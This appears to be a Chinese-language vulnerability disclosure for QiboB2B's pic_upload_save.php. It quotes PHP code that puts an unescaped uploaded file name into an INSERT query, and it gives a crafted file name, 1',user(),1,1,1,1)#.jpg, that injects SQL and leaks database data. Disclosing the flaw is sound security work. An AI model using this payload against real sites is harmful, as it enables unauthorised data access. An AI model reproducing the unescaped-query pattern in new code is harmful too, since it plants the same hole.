VULHUB ™

### 简要描述： 过滤不严。 ### 详细说明： 在qibob2b/hy/member/homepage_ctrl/pic_upload_save.php中 ``` $array[name]=is_array($postfile)?$_FILES[postfile][name]:$postfile_name; $title=$title?$title:$array[name]; $myname_str=explode(".",strtolower($array[name])); $myname=$myname_str[(count($myname_str)-1)]; if(!in_array($myname,array('gif','jpg'))) $msg="{$array[name]}图片只能是gif或者jpg的格式"; $array[path]="$webdb[updir]/homepage/pic/".ceil($uid/1000)."/$uid";//商家图片另存 $array[size]=is_array($postfile)?$_FILES[postfile][size]:$postfile_size; $webdb[company_uploadsize_max]=$webdb[company_uploadsize_max]?$webdb[company_uploadsize_max]:100; //if($array[size]>$webdb[company_uploadsize_max]*1024)$msg="{$array[name]}图片超过最大{$webdb[company_uploadsize_max]}K限制"; if($msg==''){ $picurl=upfile(is_array($postfile)?$_FILES[postfile][tmp_name]:$postfile,$array); //供应或求购生成缩略图 if($picurl){ $Newpicpath=ROOT_PATH."$array[path]/{$picurl}.gif"; gdpic(ROOT_PATH."$array[path]/$picurl",$Newpicpath,120,120);...

### 简要描述： 过滤不严。 ### 详细说明： 在qibob2b/hy/member/homepage_ctrl/pic_upload_save.php中 ``` $array[name]=is_array($postfile)?$_FILES[postfile][name]:$postfile_name; $title=$title?$title:$array[name]; $myname_str=explode(".",strtolower($array[name])); $myname=$myname_str[(count($myname_str)-1)]; if(!in_array($myname,array('gif','jpg'))) $msg="{$array[name]}图片只能是gif或者jpg的格式"; $array[path]="$webdb[updir]/homepage/pic/".ceil($uid/1000)."/$uid";//商家图片另存 $array[size]=is_array($postfile)?$_FILES[postfile][size]:$postfile_size; $webdb[company_uploadsize_max]=$webdb[company_uploadsize_max]?$webdb[company_uploadsize_max]:100; //if($array[size]>$webdb[company_uploadsize_max]*1024)$msg="{$array[name]}图片超过最大{$webdb[company_uploadsize_max]}K限制"; if($msg==''){ $picurl=upfile(is_array($postfile)?$_FILES[postfile][tmp_name]:$postfile,$array); //供应或求购生成缩略图 if($picurl){ $Newpicpath=ROOT_PATH."$array[path]/{$picurl}.gif"; gdpic(ROOT_PATH."$array[path]/$picurl",$Newpicpath,120,120); if(!file_exists($Newpicpath)){ copy(ROOT_PATH."$array[path]/{$picurl}",$Newpicpath); } $picurl="homepage/pic/".ceil($uid/1000)."/$uid/$picurl"; $msg="{$array[name]}上传成功"; $title=get_word($title,32); $db->query("INSERT INTO `{$_pre}pic` ( `pid` , `psid` , `uid` , `username` , `title` , `url` , `level` , `yz` , `posttime` , `isfm` , `orderlist` ) VALUES ('', '$psid', '$uid', '$lfjid', '$title', '$picurl', '0', '{$webdb[auto_us ``` 跟之前发的黄页系统那注入差不多。 $_FILES的不会被转义 造成了注入。 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201406/22165655e8b044aa0e6da3c361f827c5b40a3747.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/22165655e8b044aa0e6da3c361f827c5b40a3747.jpg) 构造下 1',user(),1,1,1,1)#.jpg [<img src="https://images.seebug.org/upload/201406/22165745678c82be90591204c61009c5b3f3b12f.jpg" alt="q2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/22165745678c82be90591204c61009c5b3f3b12f.jpg) 出数据。